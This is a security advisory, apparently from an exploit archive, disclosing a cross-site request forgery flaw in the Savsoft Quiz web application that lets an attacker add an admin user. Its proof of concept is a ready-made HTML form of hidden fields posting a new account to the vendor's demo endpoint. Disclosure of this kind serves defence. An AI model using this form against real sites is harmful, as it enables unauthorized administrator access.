Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability

2014.02.25
Credit: TUNISIAN CYBER
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+] Author: TUNISIAN CYBER [+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability [+] Date: 24-02-2014 [+] Category: WebApp [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-352 [+] Vendor: http://savsoftquiz.com/web/buy-now/ [+] Friendly Sites: na3il.com,th3-creative.com 1.OVERVIEW: SuSavsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability. 2.Version: All 3.Background: Savsoft Quiz is a php based web application to create and manage online quiz, test, exam on your web server or hosting http://savsoftquiz.com/web/buy-now/ 4.Proof Of Concept: <form method="POST" name="form0" action="http://savsoftquiz.com/quizdemo/index.php/user_data/insert_user"> <input type="hidden" name="username" value="miuter12"/> <input type="hidden" name="first_name" value="TUNISIAN"/> <input type="hidden" name="last_name" value="CYBER"/> <input type="hidden" name="user_email" value="g4k@hotmail.es"/> <input type="hidden" name="user_password" value="p@assw0rd"/> <input type="hidden" name="confirm_password" value="p@assw0rd"/> <input type="hidden" name="user_credit" value="blank"/> <input type="hidden" name="user_group" value="group1"/> <input type="submit" value="Click ME!"/> </form> </body> </html> 5.Solution(s): n/a 6.TIME-LINE: 2014-02-22: Vulnerability was discovered. 2014-02-22:Contact with vendor 2014-02-23:No Reply 2014-02-24:Vulnerability Released 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top